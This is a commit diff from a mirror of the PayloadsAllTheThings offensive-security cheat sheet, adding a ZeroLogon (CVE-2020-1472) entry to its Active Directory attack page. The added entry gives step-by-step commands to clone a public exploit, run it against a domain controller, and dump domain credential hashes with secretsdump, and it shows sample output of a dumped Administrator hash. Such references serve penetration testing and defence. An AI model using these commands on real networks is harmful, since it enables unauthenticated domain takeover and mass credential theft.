mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
CVE-2020-1472 Unauthenticated domain controller compromise
This commit is contained in:
parent
20dadc9815
commit
e79918bdc2
1 changed files with 23 additions and 0 deletions
|
@ -7,6 +7,7 @@
|
||||||
- [Tools](#tools)
|
- [Tools](#tools)
|
||||||
- [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
|
- [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
|
||||||
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
||||||
|
- [CVE-2020-1472 ZeroLogon](#cve-2020-1472-zerologon)
|
||||||
- [Open Shares](#open-shares)
|
- [Open Shares](#open-shares)
|
||||||
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
||||||
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
||||||
|
@ -270,6 +271,27 @@ Windows> net time /domain /set
|
||||||
|
|
||||||
* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780
|
* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780
|
||||||
|
|
||||||
|
### CVE-2020-1472 ZeroLogon
|
||||||
|
|
||||||
|
White Paper from Secura : https://www.secura.com/pathtoimg.php?id=2055
|
||||||
|
|
||||||
|
Exploit steps from the white paper
|
||||||
|
|
||||||
|
1. Spoofing the client credential
|
||||||
|
2. Disabling signing and sealing
|
||||||
|
3. Spoofing a call
|
||||||
|
4. Changing a computer's AD password
|
||||||
|
5. From password change to domain admin
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ git clone https://github.com/cube0x0/CVE-2020-1472
|
||||||
|
$ python3 CVE-2020-1472.py DC01 10.10.10.10
|
||||||
|
$ secretsdump.py 'domain/DC01$@DC01.domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
|
||||||
|
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
|
||||||
|
[*] Using the DRSUAPI method to get NTDS.DIT secrets
|
||||||
|
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000000:::
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Open Shares
|
### Open Shares
|
||||||
|
|
||||||
|
@ -1749,3 +1771,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
|
||||||
* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
|
* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
|
||||||
* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html)
|
* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html)
|
||||||
* [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/)
|
* [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/)
|
||||||
|
* [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort, September 2020](https://www.secura.com/pathtoimg.php?id=2055)
|
Loading…
Reference in a new issue